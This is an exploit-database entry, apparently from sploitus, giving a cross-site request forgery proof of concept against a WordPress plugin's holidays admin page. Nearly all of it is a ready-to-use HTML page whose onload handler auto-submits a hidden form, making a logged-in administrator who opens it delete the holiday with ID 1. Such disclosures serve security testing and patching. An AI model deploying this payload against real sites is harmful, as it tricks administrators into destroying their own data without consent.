Share
## https://sploitus.com/exploit?id=WPEX-ID:4B55F868-62F8-43A1-9817-68CD1FC6190F
Make a logged in admin open a page with the code below, this will make them delete the Holiday with ID 1

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=cip-holidays" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>